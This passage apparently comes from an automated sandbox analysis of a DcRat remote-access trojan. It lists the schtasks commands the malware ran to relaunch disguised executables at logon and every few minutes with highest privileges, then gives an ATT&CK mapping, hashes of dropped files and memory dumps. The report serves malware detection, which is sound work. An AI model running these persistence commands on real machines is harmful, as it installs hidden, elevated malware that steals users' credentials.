            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\Vss\System.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3560
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\Vss\System.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            PID:4028
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Windows\Vss\System.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:768
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\StartMenuExperienceHost.exe'" /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:4928
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:4620
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:4440
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\RuntimeBroker.exe'" /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:3700
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:3504
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Reference Assemblies\Microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:5064
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:4092
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:888
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Scheduled Task/Job: Scheduled Task
            PID:2740

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Persistence

          Boot or Logon Autostart Execution

          2
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Winlogon Helper DLL

          1
          T1547.004

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Privilege Escalation

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Boot or Logon Autostart Execution

          2
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Winlogon Helper DLL

          1
          T1547.004

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Defense Evasion

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Hide Artifacts

          1
          T1564

          Hidden Files and Directories

          1
          T1564.001

          Impair Defenses

          1
          T1562

          Disable or Modify Tools

          1
          T1562.001

          Modify Registry

          5
          T1112

          Credential Access

          Credentials from Password Stores

          1
          T1555

          Credentials from Web Browsers

          1
          T1555.003

          Unsecured Credentials

          1
          T1552

          Credentials In Files

          1
          T1552.001

          Discovery

          Query Registry

          2
          T1012

          Remote System Discovery

          1
          T1018

          System Information Discovery

          4
          T1082

          System Location Discovery

          1
          T1614

          System Language Discovery

          1
          T1614.001

          System Network Configuration Discovery

          1
          T1016

          Internet Connection Discovery

          1
          T1016.001

          Lateral Movement

          Collection

          Data from Local System

          1
          T1005

          Command and Control

          Web Service

          1
          T1102

          Exfiltration

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Surrogatereviewsession.exe.log
            Filesize

            1KB

            MD5

            c6ecc3bc2cdd7883e4f2039a5a5cf884

            SHA1

            20c9dd2a200e4b0390d490a7a76fa184bfc78151

            SHA256

            b3d90663a46ee5333f8f99df4d43c0c76bf3902e3ba3ab36c0903027176d340d

            SHA512

            892a8f8e50ff350e790e1543032c64b3e1c050198b1810f89b6ce8a23de947a3e8299e880f0e79da7e4b5373a6b95e7dd7814cd5d7406a1553ef104ff2ff091e

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            440cb38dbee06645cc8b74d51f6e5f71

            SHA1

            d7e61da91dc4502e9ae83281b88c1e48584edb7c

            SHA256

            8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

            SHA512

            3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            7511c81925750deb7ad1b9b80eea8a8d

            SHA1

            6ea759b3cbd243ae11435c6d6c5ced185eb01f49

            SHA256

            5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa

            SHA512

            5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            359d1e37a264703c99ebd01eed362de5

            SHA1

            a1122c8bf9848b3371cd191ba540864204d1d845

            SHA256

            5781f3046b0d978469415a059cf5ceae0e532869e69ab1dffb8ed878bd299b07

            SHA512

            ce3caa1d2205be8167b7cd48ebf538a9ce8c148643c26a20377894aa15cf00f90b2b5e2ebf35d40a0273c088abc11fe6f010e34691d7fbc4bef8d7e482f5087d

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            948B

            MD5

            966914e2e771de7a4a57a95b6ecfa8a9

            SHA1

            7a32282fd51dd032967ed4d9a40cc57e265aeff2

            SHA256

            98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

            SHA512

            dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            88be3bc8a7f90e3953298c0fdbec4d72

            SHA1

            f4969784ad421cc80ef45608727aacd0f6bf2e4b

            SHA256

            533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

            SHA512

            4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\0bAySDsW00.bat
            Filesize

            224B

            MD5

            bed36c0dd6930b55d603de4c3321d7c8

            SHA1

            033f5f5a8313d0ed1a207d4e2c2f0ff950ebdd99

            SHA256

            8ead4c189f3881856b3863e78249a52608276cfd717588fc66a1b17846f832c6

            SHA512

            ba35958155e67ef9373968f05783328efc4f71190a55e42be1a3b2d42a21308f5fa0a606413594cb972c7faab81b2a6c5800faa40a12dcbb96f78dc08a2a259e

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\SwJmsnywsR.bat
            Filesize

            207B

            MD5

            b088d854a1f4d6622f8497107423ac1d

            SHA1

            0c2672803d8ea9d880cd41ca8d3e13ccdeb84071

            SHA256

            ceb1be0dac9a84e5e30f18b36e52c98ec5011442762fc77ec014ed6099cbdbcc

            SHA512

            e2df945180df3156b70f1724a930307005740ab32a23e8b57c1d3ed386db2bfd260013563681d8c94dce0bdfb7f9226400db42f708ac96b9ce8b942ffe66a6b0

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iblv4cpj.svz.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ratgergedrghi.exe
            Filesize

            1.5MB

            MD5

            260fd8b292d7acf337beab707e84604c

            SHA1

            1133c94c57883f8c5624837d51fb88ef220fab06

            SHA256

            6d7b8c65737968c2ba34d5c64bf2427a49b7b4c74b3d558cf64814c97ba88cfb

            SHA512

            f83a804b7ac3918bbe76cea264f7451f5682da26b71cfa67e4e66a3281bc6c1ea478db02d16c80b01f7191e157e644fb966c56c9035e800c42d9f3539fa682b1

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe
            Filesize

            230KB

            MD5

            96ee12b0a9e8e1f0b0f85da1b482fdcb

            SHA1

            28711afb99a8397ebf5a6cb629e3e20465c0fdfa

            SHA256

            253b05b6848e8a312b0a622d62d370d6dedf59f24fb52fca803234977880649b

            SHA512

            f9f0012cc0eec4fe176338cc17ea8f870660ea5db8a33cc5000348e3bcdf4067ef7192dc3ecb3b7a5ff271d97085ba1c66eb5e170d24faf3daaee2b504c1e411

            Download Submit

          • C:\providerWinsessionruntimehost\886983d96e3d3e
            Filesize

            317B

            MD5

            2ad2ef9f0ed67579246413f03efaaaba

            SHA1

            8f439187f5108616c180dabc1021698a9472a0fa

            SHA256

            b7e8e33f21b50ecb3518997a30854c6412b5a575a66dc234ddec32e08d75dad7

            SHA512

            25c0542d0e96773c9aba07060297d94992c1f61d8588f7cb922d77bfed869a719278b31852a29f2d1687db7e2659d6a7c54f688ae0c28c5dcac585c713e41490

            Download Submit

          • C:\providerWinsessionruntimehost\Surrogatereviewsession.exe
            Filesize

            1.2MB

            MD5

            6227db1487700389df5e1bd5c29e16b6

            SHA1

            68795a61f653f7b63fa5e2ebbbe1bc97aed3242f

            SHA256

            359ede2f634418bc23101b414c0b35139c1dbacd9a6b5ff152f0733c4a9bd3d0

            SHA512

            2668b4a6d18b3ee6b2961b7eea6c1de669ec8df9b679f2a5fb3041d9f469eba92b4bd1467ea7b8ec7fc1e914a6d6cb008dbbe67bf67cc41b05d1f1979b56eead

            Download Submit

          • C:\providerWinsessionruntimehost\Xt9KI1krEJFJGvttvIkhdsOgzo3.vbe
            Filesize

            223B

            MD5

            88ef9c38e649b66c4641665e74fce531

            SHA1

            1603bd91a66807a8c7095d0cbc64c9d3679e6780

            SHA256

            65455609bf7611ec4bd6f9fbc08a0835612e15562665349f67ae92b0287243c6

            SHA512

            a3cd4848553acc3a685b10adf3b801f5ec78e9e706c7e0d6f89425dd7c64f4809dfa5001ee7aec60abeb8e23043608a351bc9ca52b687f6082f4880158465f16

            Download Submit

          • C:\providerWinsessionruntimehost\g3CEdDrA4txDO2RaU.bat
            Filesize

            173B

            MD5

            2c8e46086b87c611b970c172dcb48bc1

            SHA1

            c489d490655a5af55c7a9b33cf69a460093fc1ec

            SHA256

            c8aaa713c91dfae8607a468ce53adb457685e5b89127ea6a36625058fadc00ab

            SHA512

            e7e23ae1690897518083cf5a5d2a53ef6c9e9ce8d520deff8d69b091305c0cfcd2a84ebf6ecccc5ef81f9de97b8a70796d243ee7b002b6cd63966bc1f4602377

            Download Submit

          • memory/1628-97-0x000002147F630000-0x000002147F642000-memory.dmp

            Filesize

            72KB

            Download

          • memory/1628-96-0x000002147F2C0000-0x000002147F2CA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/1628-60-0x000002147F2F0000-0x000002147F30E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/1628-59-0x000002147F5E0000-0x000002147F630000-memory.dmp

            Filesize

            320KB

            Download

          • memory/1628-58-0x000002147F560000-0x000002147F5D6000-memory.dmp

            Filesize

            472KB

            Download

          • memory/1628-19-0x00007FFDF8393000-0x00007FFDF8395000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1628-120-0x00007FFDF8390000-0x00007FFDF8E51000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1628-18-0x0000021464E40000-0x0000021464E80000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1628-23-0x00007FFDF8390000-0x00007FFDF8E51000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2856-124-0x00000000024F0000-0x00000000024FA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/2856-123-0x00000000024E0000-0x00000000024E8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2856-126-0x0000000002510000-0x0000000002518000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2856-127-0x0000000002520000-0x000000000252C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/2856-125-0x0000000002500000-0x000000000250C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/2856-128-0x0000000002530000-0x000000000253A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/2856-122-0x00000000024C0000-0x00000000024DC000-memory.dmp

            Filesize

            112KB

            Download

          • memory/2856-121-0x00000000024A0000-0x00000000024AE000-memory.dmp

            Filesize

            56KB

            Download

          • memory/2856-116-0x0000000000260000-0x00000000003A2000-memory.dmp

            Filesize

            1.3MB

            Download

          • memory/4100-41-0x000002139C780000-0x000002139C7A2000-memory.dmp

            Filesize

            136KB

            Download